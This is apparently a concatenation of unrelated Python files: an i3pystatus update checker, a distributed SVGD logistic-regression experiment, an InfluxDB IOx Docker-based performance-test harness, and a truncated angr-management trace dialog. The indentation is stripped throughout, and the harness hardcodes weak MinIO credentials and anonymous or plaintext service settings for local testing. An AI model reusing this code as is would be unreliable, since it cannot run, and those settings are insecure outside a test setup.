shortest_path2 = env.sim.action_space_shortest_path(source, targets)
assert shortest_path2 == []
env.close()
|
__init__.py
|
import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
from i3pystatus.core.desktop import DesktopNotification
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
To use select appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
Right clicking shows a desktop notification with a summary count and a list
of available updates.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
* For each backend registered there is one formatter named after the
backend, multiple identical backends do not accumulate, but overwrite
each other.
* For example, `{Cower}` (note capital C) is the number of updates
reported by the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status()
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are "
"available. If not set the module will be hidden if no updates "
"are available."),
("format_working", "Format used while update queries are run. By "
"default the same as ``format``."),
("format_summary", "Format for the summary line of notifications. By "
"default the same as ``format``."),
("notification_icon", "Icon shown when reporting the list of updates. "
"Default is ``software-update-available``, and can be "
"None for no icon."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
format_summary = None
notification_icon = "software-update-available"
color = "#00DD00"
color_no_updates = None
color_working = None
on_leftclick = "run"
on_rightclick = "report"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
if self.format_summary is None: # we want to allow an empty format
self.format_summary = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.notif_body = {}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
for backend in self.backends:
key = backend.__class__.__name__
if key not in self.data:
self.data[key] = "?"
if key not in self.notif_body:
self.notif_body[key] = ""
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
name = backend.__class__.__name__
updates, notif_body = backend.updates
try:
updates_count += updates
except TypeError:
pass
self.data[name] = updates
self.notif_body[name] = notif_body or ""
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
def report(self):
DesktopNotification(
title=formatp(self.format_summary, **self.data).strip(),
body="\n".join(self.notif_body.values()),
icon=self.notification_icon,
urgency=1,
timeout=0,
).display()
|
logreg.py
|
"""
Run with `python -m torch.distributed.launch --nproc_per_node=2 experiments/dist.py`
"""
import os
import shutil
import traceback
import click
import pandas as pd
from scipy.io import loadmat
import torch
import torch.distributed as dist
from torch.distributions.gamma import Gamma
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.normal import Normal
from multiprocessing import Process
from definitions import DATA_DIR, RESULTS_DIR
import dsvgd
from logreg_plots import get_results_dir, make_plots
def run(rank, num_shards, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein):
torch.manual_seed(rank)
# Define model
# Load data
mat = loadmat(os.path.join(DATA_DIR, 'benchmarks.mat'))
dataset = mat[dataset_name][0, 0]
# split #, instance, features/label
x_train = torch.from_numpy(dataset[0][dataset[2] - 1][fold]).to(torch.float)
t_train = dataset[1][dataset[2] - 1][fold]
samples_per_shard = int(x_train.shape[0] / num_shards)
d = 1 + x_train.shape[1]
alpha_prior = Gamma(1, 1)
w_prior = lambda alpha: MultivariateNormal(torch.zeros(x_train.shape[1]), torch.eye(x_train.shape[1]) / alpha)
def data_idx_range(rank):
"Returns the (start,end) indices of the range of data belonging to worker with rank `rank`"
return (samples_per_shard * rank, samples_per_shard * (rank+1))
def logp(shard, x):
"Estimate of full log likelihood using partition's local data."
# Get shard-local data
# NOTE: this will drop data if not divisible by num_shards
shard_start_idx, shard_end_idx = data_idx_range(shard)
x_train_local = x_train[shard_start_idx:shard_end_idx]
t_train_local = t_train[shard_start_idx:shard_end_idx]
alpha = torch.exp(x[0])
w = x[1:].reshape(-1)
logp = alpha_prior.log_prob(alpha)
logp += w_prior(alpha).log_prob(w)
logp += -torch.log(1. + torch.exp(-1.*torch.mv(t_train_local * x_train_local, w))).sum()
return logp
def kernel(x, y):
return torch.exp(-1.*torch.dist(x, y, p=2)**2)
# Initialize particles
q = Normal(0, 1)
make_sample = lambda: q.sample((d, 1))
particles = torch.cat([make_sample() for _ in range(nparticles)], dim=1).t()
dist_sampler = dsvgd.DistSampler(rank, num_shards, (lambda x: logp(rank, x)), kernel, particles,
samples_per_shard, samples_per_shard*num_shards,
exchange_particles=exchange in ['all_particles', 'all_scores'],
exchange_scores=exchange == 'all_scores',
include_wasserstein=wasserstein)
data = []
for l in range(niter):
if rank == 0:
print('Iteration {}'.format(l))
# save results right before updating particles
for i in range(len(dist_sampler.particles)):
data.append(pd.Series([l, torch.tensor(dist_sampler.particles[i]).numpy()], index=['timestep', 'value']))
dist_sampler.make_step(stepsize, h=10.0)
# save results after last update
for i in range(len(dist_sampler.particles)):
data.append(pd.Series([l+1, torch.tensor(dist_sampler.particles[i]).numpy()], index=['timestep', 'value']))
pd.DataFrame(data).to_pickle(
os.path.join(
get_results_dir(dataset_name, fold, num_shards, nparticles, stepsize, exchange, wasserstein),
'shard-{}.pkl'.format(rank)))
def init_distributed(rank, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein):
try:
dist.init_process_group('tcp', rank=rank, init_method='env://')
rank = dist.get_rank()
num_shards = dist.get_world_size()
run(rank, num_shards, dataset_name, fold, nparticles, niter, stepsize, exchange, wasserstein)
except Exception as e:
print(traceback.format_exc())
raise e
@click.command()
@click.option('--dataset', type=click.Choice([
'banana', 'diabetis', 'german', 'image', 'splice', 'titanic', 'waveform']), default='banana')
@click.option('--fold', type=int, default=42)
@click.option('--nproc', type=click.IntRange(0,32), default=1)
@click.option('--nparticles', type=int, default=10)
@click.option('--niter', type=int, default=100)
@click.option('--stepsize', type=float, default=1e-3)
@click.option('--exchange', type=click.Choice(['partitions', 'all_particles', 'all_scores']), default='partitions')
@click.option('--wasserstein/--no-wasserstein', default=False)
@click.option('--master_addr', default='127.0.0.1', type=str)
@click.option('--master_port', default=29500, type=int)
@click.option('--plots/--no-plots', default=True)
@click.pass_context
def cli(ctx, dataset, fold, nproc, nparticles, niter, stepsize, exchange, wasserstein, master_addr, master_port, plots):
# clean out any previous results files
results_dir = get_results_dir(dataset, fold, nproc, nparticles, stepsize, exchange, wasserstein)
if os.path.isdir(results_dir):
shutil.rmtree(results_dir)
os.mkdir(results_dir)
if nproc == 1:
run(0, 1, dataset, fold, nparticles, niter, stepsize, exchange, wasserstein)
else:
os.environ['MASTER_ADDR'] = master_addr
os.environ['MASTER_PORT'] = str(master_port)
os.environ['WORLD_SIZE'] = str(nproc)
processes = []
for rank in range(nproc):
p = Process(target=init_distributed, args=(rank, dataset, fold, nparticles, niter, stepsize, exchange, wasserstein,))
p.start()
processes.append(p)
for p in processes:
p.join()
if plots:
ctx.forward(make_plots)
if __name__ == "__main__":
cli()
|
perf.py
|
#!/usr/bin/env python3
import argparse
import random
import glob
import logging
import math
import os
import pathlib
import shutil
import signal
import socket
import subprocess
import threading
import time
import docker
import grpc_requests
import minio
import requests
import toml
import urllib3
ioxperf_name = "ioxperf"
ioxperf_labels = {ioxperf_name: None}
ioxperf_filters = {'label': ioxperf_name}
org_name = 'myorg'
bucket_name = 'mybucket'
db_name = '%s_%s' % (org_name, bucket_name)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--skip-build', help='do not build IOx, execute existing binaries', action='store_true')
parser.add_argument('--debug', help='build/execute debug IOx binaries instead of release', action='store_true')
parser.add_argument('--object-store', help='object store type', default='s3', choices=('memory', 's3', 'file'))
parser.add_argument('--kafka-zookeeper', help='use Kafka/ZooKeeper instead of Redpanda', action='store_true')
parser.add_argument('--hold', help='keep all services running after tests complete', action='store_true')
parser.add_argument('--cleanup', help='remove Docker assets and exit (TODO terminate IOx processes)',
action='store_true')
parser.add_argument('--no-volumes', help='do not mount Docker volumes', action='store_true')
parser.add_argument('--no-jaeger', help='do not collect traces in Jaeger', action='store_true')
parser.add_argument('batteries', help='name of directories containing test batteries, or "all"', nargs='*')
args = parser.parse_args()
do_trace = args.hold and not args.no_jaeger
os.chdir(os.path.dirname(os.path.abspath(__file__)))
try:
dc = docker.from_env()
except docker.errors.DockerException as e:
print('failed to communicate with Docker, is Docker running?')
exit(1)
if args.cleanup:
docker_cleanup_resources(dc)
return
cleanup_logs_and_volumes(dc)
batteries = args.batteries
if batteries == ['all']:
batteries = (
p.relative_to(os.getcwd())
for p
in pathlib.Path(os.getcwd()).iterdir()
if p.joinpath('datagen.toml').is_file()
)
else:
for battery in batteries:
p = pathlib.Path(os.getcwd()).joinpath(battery, 'datagen.toml')
if not p.is_file():
print('invalid battery "%s" - does not contain datagen.toml' % battery)
exit(1)
processes = {}
tests_pass = True
try:
if not args.skip_build:
build_with_aws = args.object_store == 's3'
cargo_build_iox(args.debug, build_with_aws)
docker_create_network(dc)
if args.kafka_zookeeper:
docker_run_zookeeper(dc, args.no_volumes)
docker_run_kafka(dc, args.no_volumes)
else:
docker_run_redpanda(dc, args.no_volumes)
if args.object_store == 's3':
docker_run_minio(dc, args.no_volumes)
if do_trace:
docker_run_jaeger(dc)
processes['iox_router'] = exec_iox(1, 'iox_router',
debug=args.debug, object_store=args.object_store, do_trace=do_trace)
processes['iox_writer'] = exec_iox(2, 'iox_writer',
debug=args.debug, object_store=args.object_store, do_trace=do_trace)
grpc_create_database(1, 2)
print('-' * 40)
for battery in batteries:
if not run_test_battery(battery, 1, 2, debug=args.debug, do_trace=do_trace):
tests_pass = False
print('-' * 40)
except Exception as e:
print(e)
tests_pass = False
if args.hold:
print('subprocesses are still running, ctrl-C to terminate and exit')
try:
signal.pause()
except KeyboardInterrupt:
pass
print('-' * 40)
for service_name, process in processes.items():
if process is None:
continue
print('%s <- SIGTERM' % service_name)
process.send_signal(signal.SIGTERM)
exit_code = process.wait(1.0)
if exit_code is None:
print('%s <- SIGKILL' % service_name)
process.send_signal(signal.SIGKILL)
if exit_code != 0:
print('%s exited with %d' % (service_name, exit_code))
docker_cleanup_resources(dc)
if not tests_pass:
exit(1)
def docker_cleanup_resources(dc):
containers = dc.containers.list(all=True, filters=ioxperf_filters)
if len(containers) > 0:
print('removing containers: %s' % ', '.join((c.name for c in containers)))
for container in containers:
container.remove(v=True, force=True)
networks = dc.networks.list(filters=ioxperf_filters)
if len(networks) > 0:
print('removing networks: %s' % ', '.join((n.name for n in networks)))
for network in networks:
network.remove()
def cleanup_logs_and_volumes(dc):
docker_cleanup_resources(dc)
volume_paths = glob.glob(os.path.join(os.getcwd(), 'volumes', '*'))
if len(volume_paths) > 0:
print('removing volume contents: %s' % ', '.join((os.path.relpath(p) for p in volume_paths)))
for path in volume_paths:
shutil.rmtree(path)
log_paths = glob.glob(os.path.join(os.getcwd(), 'logs', '*'))
if len(log_paths) > 0:
print('removing logs: %s' % ', '.join((os.path.relpath(p) for p in log_paths)))
for path in log_paths:
os.unlink(path)
def docker_create_network(dc):
dc.networks.create(name=ioxperf_name, driver='bridge', check_duplicate=True, scope='local',
labels=ioxperf_labels)
def docker_pull_image_if_needed(dc, image):
try:
dc.images.get(image)
except docker.errors.ImageNotFound:
print("pulling image '%s'..." % image)
dc.images.pull(image)
def docker_wait_container_running(container):
while True:
container.reload()
if container.status == 'running':
print("container '%s' has started" % container.name)
return
elif container.status == 'created':
print("waiting for container '%s' to start" % container.name)
time.sleep(0.1)
raise Exception("container '%s' status '%s' unexpected" % (container.name, container.status))
def pipe_container_logs_to_file(container, log_filename):
with pathlib.Path(os.path.join(os.getcwd(), 'logs')) as dir_path:
if not dir_path.exists():
os.mkdir(dir_path, mode=0o777)
logs = container.logs(stdout=True, stderr=True, stream=True, follow=True)
f = open(file=os.path.join(os.getcwd(), 'logs', log_filename), mode='wb', buffering=0)
def thread_function():
for entry in logs:
f.write(entry)
f.flush()
f.close()
threading.Thread(target=thread_function, daemon=True).start()
def check_port_open(addr, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port_open = sock.connect_ex((addr, port)) == 0
sock.close()
return port_open
def docker_run_redpanda(dc, no_volumes):
image = 'vectorized/redpanda:v21.7.6'
command = ['redpanda', 'start',
'--overprovisioned', '--smp 1', '--memory 128M', '--reserve-memory', '0M', '--node-id', '0',
'--check=false', '--kafka-addr', 'CLIENT://0.0.0.0:9092,EXTERNAL://0.0.0.0:9093',
'--advertise-kafka-addr', 'CLIENT://kafka:9092,EXTERNAL://localhost:9093']
name = '%s-%s' % (ioxperf_name, 'redpanda')
ports = {'9093/tcp': 9093}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/redpanda'): {
'bind': '/var/lib/redpanda/data',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, command=command, detach=True, name=name, hostname='kafka',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 9093):
break
print('waiting for Redpanda to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'redpanda.log')
print('Redpanda service is ready')
return container
def docker_run_zookeeper(dc, no_volumes):
image = 'docker.io/bitnami/zookeeper:3'
name = '%s-%s' % (ioxperf_name, 'zookeeper')
ports = {'2181/tcp': 2181}
env = {
'ALLOW_ANONYMOUS_LOGIN': 'yes',
}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/zookeeper'): {
'bind': '/bitnami/zookeeper',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, environment=env, name=name, hostname='zookeeper',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 2181):
break
print('waiting for ZooKeeper to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'zookeeper.log')
print('ZooKeeper service is ready')
return container
def docker_run_kafka(dc, no_volumes):
image = 'docker.io/bitnami/kafka:2'
name = '%s-%s' % (ioxperf_name, 'kafka')
ports = {'9093/tcp': 9093}
env = {
'KAFKA_CFG_ZOOKEEPER_CONNECT': 'zookeeper:2181',
'ALLOW_PLAINTEXT_LISTENER': 'yes',
'KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP': 'CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT',
'KAFKA_CFG_LISTENERS': 'CLIENT://:9092,EXTERNAL://:9093',
'KAFKA_CFG_ADVERTISED_LISTENERS': 'CLIENT://kafka:9092,EXTERNAL://localhost:9093',
'KAFKA_INTER_BROKER_LISTENER_NAME': 'CLIENT',
'KAFKA_CFG_LOG_RETENTION_CHECK_INTERVAL_MS': '100',
}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/kafka'): {
            'bind': '/bitnami/kafka',
'mode': 'rw',
}}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, environment=env, name=name, hostname='kafka',
labels=ioxperf_labels, network=ioxperf_name, ports=ports, volumes=volumes)
docker_wait_container_running(container)
while True:
if check_port_open('127.0.0.1', 9093):
break
print('waiting for Kafka to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'kafka.log')
print('Kafka service is ready')
return container
def docker_run_minio(dc, no_volumes):
image = 'minio/minio:RELEASE.2021-08-05T22-01-19Z'
command = 'server --address 0.0.0.0:9000 --console-address 0.0.0.0:9001 /data'
name = '%s-%s' % (ioxperf_name, 'minio')
ports = {'9000/tcp': 9000, '9001/tcp': 9001}
if no_volumes:
volumes = None
else:
volumes = {os.path.join(os.getcwd(), 'volumes/minio'): {
'bind': '/data',
'mode': 'rw',
}}
env = {
'MINIO_ROOT_USER': 'minio',
'MINIO_ROOT_PASSWORD': 'miniominio',
'MINIO_PROMETHEUS_AUTH_TYPE': 'public',
'MINIO_HTTP_TRACE': '/dev/stdout',
}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, command=command, detach=True, environment=env, name=name,
hostname='minio', labels=ioxperf_labels, network=ioxperf_name, ports=ports,
volumes=volumes)
docker_wait_container_running(container)
while True:
timeout = urllib3.util.Timeout(connect=0.1, read=0.1)
http_client = urllib3.PoolManager(num_pools=1, timeout=timeout, retries=False)
try:
mc = minio.Minio(endpoint='127.0.0.1:9000', access_key='minio', secret_key='miniominio', secure=False,
http_client=http_client)
if not mc.bucket_exists('iox1'):
mc.make_bucket('iox1')
if not mc.bucket_exists('iox2'):
mc.make_bucket('iox2')
break
except (urllib3.exceptions.ProtocolError, urllib3.exceptions.TimeoutError, minio.error.S3Error):
pass
print('waiting for Minio to become ready')
time.sleep(0.5)
pipe_container_logs_to_file(container, 'minio.log')
print('Minio service ready')
return container
def docker_run_jaeger(dc):
image = 'jaegertracing/all-in-one:1.26'
name = '%s-%s' % (ioxperf_name, 'jaeger')
ports = {'16686/tcp': 16686, '6831/udp': 6831}
docker_pull_image_if_needed(dc, image)
container = dc.containers.run(image=image, detach=True, name=name, hostname='jaeger', labels=ioxperf_labels,
network=ioxperf_name, ports=ports)
docker_wait_container_running(container)
while True:
try:
if requests.get(url='http://127.0.0.1:16686/search', timeout=0.1).status_code / 100 == 2:
break
except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
pass
print('waiting for Jaeger to become ready')
time.sleep(0.1)
pipe_container_logs_to_file(container, 'jaeger.log')
print('Jaeger service ready')
return container
def cargo_build_iox(debug=False, build_with_aws=True):
t = time.time()
print('building IOx')
features = []
if build_with_aws:
features.append('aws')
features = ','.join(features)
env = os.environ.copy()
args = ['cargo', 'build']
if debug:
env['RUSTFLAGS'] = '-C debuginfo=1'
env['RUST_BACKTRACE'] = '1'
else:
args += ['--release']
args += ['--package', 'influxdb_iox', '--features', features, '--bin', 'influxdb_iox']
args += ['--package', 'iox_data_generator', '--bin', 'iox_data_generator']
process = subprocess.run(args=args, env=env)
if process.returncode != 0:
raise ChildProcessError('cargo build returned %d' % process.returncode)
print('building IOx finished in %.2fs' % (time.time() - t))
def exec_iox(id, service_name, debug=False, object_store='memory', print_only=False, do_trace=False):
http_addr = 'localhost:%d' % (id * 10000 + 8080)
grpc_addr = 'localhost:%d' % (id * 10000 + 8082)
if debug:
iox_path = os.path.abspath(os.path.join(os.getcwd(), '../target/debug/influxdb_iox'))
else:
iox_path = os.path.abspath(os.path.join(os.getcwd(), '../target/release/influxdb_iox'))
args = [iox_path, 'run']
env = {
'INFLUXDB_IOX_ID': str(id),
'INFLUXDB_IOX_BIND_ADDR': http_addr,
'INFLUXDB_IOX_GRPC_BIND_ADDR': grpc_addr,
'INFLUXDB_IOX_BUCKET': 'iox%d' % id,
'LOG_DESTINATION': 'stdout',
'LOG_FORMAT': 'full',
'RUST_BACKTRACE': '1',
'LOG_FILTER': 'debug,lifecycle=info,rusoto_core=warn,hyper=warn,h2=warn',
}
if do_trace:
env['TRACES_EXPORTER'] = 'jaeger'
env['TRACES_EXPORTER_JAEGER_AGENT_HOST'] = 'localhost'
env['TRACES_EXPORTER_JAEGER_AGENT_PORT'] = '6831'
env['TRACES_EXPORTER_JAEGER_SERVICE_NAME'] = service_name
env['TRACES_SAMPLER'] = 'always_on'
if object_store == 'memory':
env['INFLUXDB_IOX_OBJECT_STORE'] = 'memory'
elif object_store == 's3':
env['INFLUXDB_IOX_OBJECT_STORE'] = 's3'
env['AWS_ACCESS_KEY_ID'] = 'minio'
env['AWS_SECRET_ACCESS_KEY'] = 'miniominio'
env['AWS_ENDPOINT'] = 'http://localhost:9000'
elif object_store == 'file':
env['INFLUXDB_IOX_OBJECT_STORE'] = 'file'
env['INFLUXDB_IOX_DB_DIR'] = 'volumes/%s' % service_name
else:
raise ValueError('invalid object_store value "%s"' % object_store)
if print_only:
print()
for k in sorted(env.keys()):
print('%s=%s' % (k, env[k]))
print(' '.join(args))
print()
return None
log_file = open('logs/%s.log' % service_name, mode='w')
process = subprocess.Popen(args=args, env=env, stdout=log_file, stderr=log_file)
while True:
if process.poll() is not None:
raise ChildProcessError('service %s stopped unexpectedly, check %s' % (service_name, log_file.name))
router = grpc_requests.Client(grpc_addr, lazy=True)
while True:
try:
router.register_service('influxdata.iox.management.v1.ManagementService')
break
except:
# fall through to retry
pass
try:
server_status_response = router.request('influxdata.iox.management.v1.ManagementService', 'GetServerStatus',
None)
if 'server_status' in server_status_response and server_status_response['server_status'][
'initialized'] is True:
break
except:
# fall through to retry
pass
print('waiting for %s to become ready' % service_name)
time.sleep(0.1)
print('%s service ready' % service_name)
return process
def grpc_create_database(router_id, writer_id):
print('creating database "%s" on both IOx servers' % db_name)
router_db_rules = {
'rules': {
'name': db_name,
'partition_template': {
'parts': [
{'time': '%Y-%m-%d %H:00:00'},
],
},
'lifecycle_rules': {
'immutable': True,
'worker_backoff_millis': '1000',
'catalog_transactions_until_checkpoint': '100',
'late_arrive_window_seconds': 300,
'persist_row_threshold': '1000000',
'persist_age_threshold_seconds': 1800,
'mub_row_threshold': '100000',
'max_active_compactions_cpu_fraction': 1.0,
},
'routing_config': {'sink': {'kafka': {}}},
'worker_cleanup_avg_sleep': '500s',
'write_buffer_connection': {
'direction': 'DIRECTION_WRITE',
'type': 'kafka',
'connection': '127.0.0.1:9093',
'connection_config': {},
'creation_config': {
'n_sequencers': 1,
'options': {},
},
},
},
}
writer_db_rules = {
'rules': {
'name': db_name,
'partition_template': {
'parts': [
{'time': '%Y-%m-%d %H:00:00'}
],
},
'lifecycle_rules': {
'buffer_size_soft': 1024 * 1024 * 1024,
'buffer_size_hard': 1024 * 1024 * 1024 * 2,
'worker_backoff_millis': 100,
'max_active_compactions': 1,
'persist': True,
'persist_row_threshold': 10000000,
'catalog_transactions_until_checkpoint': 100,
'late_arrive_window_seconds': 300,
'persist_age_threshold_seconds': 1800,
'mub_row_threshold': 100000,
},
'routing_config': {'sink': {'kafka': {}}},
'worker_cleanup_avg_sleep': '500s',
'write_buffer_connection': {
'direction': 'DIRECTION_READ',
'type': 'kafka',
'connection': '127.0.0.1:9093',
'connection_config': {},
'creation_config': {
'n_sequencers': 1,
'options': {},
},
},
},
}
if router_id is not None:
router_grpc_addr = 'localhost:%d' % (router_id * 10000 + 8082)
router = grpc_requests.Client(router_grpc_addr, lazy=True)
router.register_service('influxdata.iox.management.v1.ManagementService')
router.request('influxdata.iox.management.v1.ManagementService', 'CreateDatabase', router_db_rules)
router_http_addr = 'localhost:%d' % (router_id * 10000 + 8080)
router_write_url = 'http://%s/api/v2/write?org=%s&bucket=%s' % (router_http_addr, org_name, bucket_name)
lp = "sentinel,source=perf.py f=1i"
response = requests.post(url=router_write_url, data=lp, timeout=10)
if not response.ok:
print('failed to write to router')
print(response.reason)
print(response.content)
return
else:
print()
print(router_db_rules)
print()
if writer_id is not None:
writer_grpc_addr = 'localhost:%d' % (writer_id * 10000 + 8082)
writer = grpc_requests.Client(writer_grpc_addr, lazy=True)
writer.register_service('influxdata.iox.management.v1.ManagementService')
writer.request('influxdata.iox.management.v1.ManagementService', 'CreateDatabase', writer_db_rules)
writer_http_addr = 'localhost:%d' % (writer_id * 10000 + 8080)
writer_query_url = 'http://%s/api/v3/query' % writer_http_addr
writer_query_params = {'q': 'select count(1) from sentinel', 'd': db_name}
response = requests.get(url=writer_query_url, params=writer_query_params, timeout=10)
for i in range(20):
if response.ok:
break
print('waiting for round trip test to succeed')
time.sleep(0.5)
response = requests.get(url=writer_query_url, params=writer_query_params, timeout=10)
if not response.ok:
print(response.reason)
print(response.content)
return
else:
print()
print(writer_db_rules)
print()
print('created database "%s" on both IOx servers' % db_name)
def run_test_battery(battery_name, router_id, writer_id, debug=False, do_trace=False):
# TODO drop do_trace when IOx can be configured to always trace
print('starting test battery "%s"' % battery_name)
failed = False
# Write
battery_dir = os.path.join(os.getcwd(), battery_name)
datagen_filename = os.path.join(battery_dir, 'datagen.toml')
if debug:
iox_data_generator_path = os.path.abspath(os.path.join(os.getcwd(), '../target/debug/iox_data_generator'))
else:
iox_data_generator_path = os.path.abspath(os.path.join(os.getcwd(), '../target/release/iox_data_generator'))
router_http_addr = 'localhost:%d' % (router_id * 10000 + 8080)
args = [iox_data_generator_path,
'--host', router_http_addr, '--token', 'arbitrary',
'--org', org_name, '--bucket', bucket_name,
'--spec', datagen_filename]
env = {
'RUST_BACKTRACE': '0',
}
log_file = open('logs/test.log', mode='w')
if subprocess.run(args=args, stdout=log_file, stderr=log_file, env=env).returncode != 0:
raise ChildProcessError(
'failed to run iox_data_generator for battery "%s", check %s' % (battery_name, log_file.name))
# Query
writer_http_addr = 'localhost:%d' % (writer_id * 10000 + 8080)
query_url = 'http://%s/api/v3/query' % writer_http_addr
queries_filename = os.path.join(battery_dir, 'queries.toml')
queries = toml.load(open(queries_filename))
for query in queries['queries']:
if 'sql' not in query:
print('query missing SQL query')
print(query)
print()
failed = True
continue
sql = query['sql']
name = query['name']
if name is None:
name = sql
print('running test "%s"' % name)
time_start = time.time()
params = {'q': sql, 'format': 'csv', 'd': db_name}
headers = {}
if do_trace:
# TODO remove this after IOx can be configured to sample 100% of traces
headers['jaeger-debug-id'] = 'from-perf'
response = requests.get(url=query_url, params=params, headers=headers)
time_delta = '%dms' % math.floor((time.time() - time_start) * 1000)
if not response.ok:
print(response.reason)
print(response.content.decode('UTF-8'))
print()
failed = True
continue
got = response.content.decode('UTF-8').strip()
print('time: %s' % time_delta)
if 'expect' in query:
expect = query['expect'].strip()
if expect != got:
print('expected: %s' % expect)
print('got: %s' % got)
failed = True
else:
print('OK')
elif 'expect_filename' in query:
path = pathlib.Path(os.path.join(battery_dir, query['expect_filename']))
if not path.is_file():
print('file "%s" not found' % path)
print()
failed = True
continue
expect = open(path).read().strip()
if expect != got:
print('expected: %s' % expect)
print('got: %s' % got)
failed = True
else:
print('OK')
else:
print('OK')
print()
print('completed test battery "%s"' % battery_name)
return not failed
if __name__ == "__main__":
logging.getLogger('grpc_requests.client').setLevel(logging.ERROR)
main()
|
chess_trace_list.py
|
# pylint:disable=unused-argument
import typing
from typing import List, Optional, Tuple, TYPE_CHECKING
import threading
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
import PySide2
from PySide2.QtWidgets import QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QMessageBox, QTableView, \
QAbstractItemView, QHeaderView, QLabel
from PySide2.QtCore import Qt, QAbstractTableModel
try:
import slacrs
except ImportError:
slacrs = None
from angrmanagement.logic.threads import gui_thread_schedule_async
from angrmanagement.config import Conf
if TYPE_CHECKING:
from angrmanagement.ui.workspace import Workspace
class TraceDescriptor:
"""
Models a trace.
"""
def __init__(self, trace_id: str, input_id: str, created_at, type_: str):
self.trace_id = trace_id
self.input_id = input_id
self.created_at = created_at
self.type = type_
class QTraceTableModel(QAbstractTableModel):
"""
Implements a table model for traces.
"""
Headers = ["Trace ID", "Created at", "Input ID", "Input Length", "Type"]
COL_TRACEID = 0
COL_CREATEDAT = 1
COL_INPUTID = 2
COL_INPUTLENGTH = 3
COL_TYPE = 4
def __init__(self):
super().__init__()
self._traces: List[TraceDescriptor] = [ ]
@property
def traces(self):
return self._traces
@traces.setter
def traces(self, v):
self.beginResetModel()
self._traces = v
self.endResetModel()
def rowCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.traces)
def columnCount(self, parent:PySide2.QtCore.QModelIndex=...) -> int:
return len(self.Headers)
def headerData(self, section:int, orientation:PySide2.QtCore.Qt.Orientation, role:int=...) -> typing.Any:
if role != Qt.DisplayRole:
return None
if section < len(self.Headers):
return self.Headers[section]
return None
def data(self, index:PySide2.QtCore.QModelIndex, role:int=...) -> typing.Any:
if not index.isValid():
return None
row = index.row()
if row >= len(self.traces):
return None
trace = self.traces[row]
col = index.column()
if role == Qt.DisplayRole:
return self._get_column_text(trace, col)
return None
@staticmethod
def _get_column_text(trace: TraceDescriptor, col: int) -> str:
mapping = {
QTraceTableModel.COL_TRACEID: QTraceTableModel._get_trace_id,
QTraceTableModel.COL_CREATEDAT: QTraceTableModel._get_trace_created_at,
QTraceTableModel.COL_TYPE: QTraceTableModel._get_trace_type,
QTraceTableModel.COL_INPUTID: QTraceTableModel._get_trace_input_id,
QTraceTableModel.COL_INPUTLENGTH: lambda x: "Unknown",
}
return mapping[col](trace)
@staticmethod
def _get_trace_id(trace: TraceDescriptor) -> str:
return trace.trace_id
@staticmethod
def _get_trace_created_at(trace: TraceDescriptor) -> str:
return trace.created_at
@staticmethod
def _get_trace_type(trace: TraceDescriptor) -> str:
return trace.type
@staticmethod
def _get_trace_input_id(trace: TraceDescriptor) -> str:
return trace.input_id
class QTraceTableView(QTableView):
"""
Implements a trace view for CHESS traces.
"""
def __init__(self):
super().__init__()
self.horizontalHeader().setVisible(True)
self.verticalHeader().setVisible(False)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setSelectionMode(QAbstractItemView.MultiSelection)
self.setHorizontalScrollMode(self.ScrollPerPixel)
